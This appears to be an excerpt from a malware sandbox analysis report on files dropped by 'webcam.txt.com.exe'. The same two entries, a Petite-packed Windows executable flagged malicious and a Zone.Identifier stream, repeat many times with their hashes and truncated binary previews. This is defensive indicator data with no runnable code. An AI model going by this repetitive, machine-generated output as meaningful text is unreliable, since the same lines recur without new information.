                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
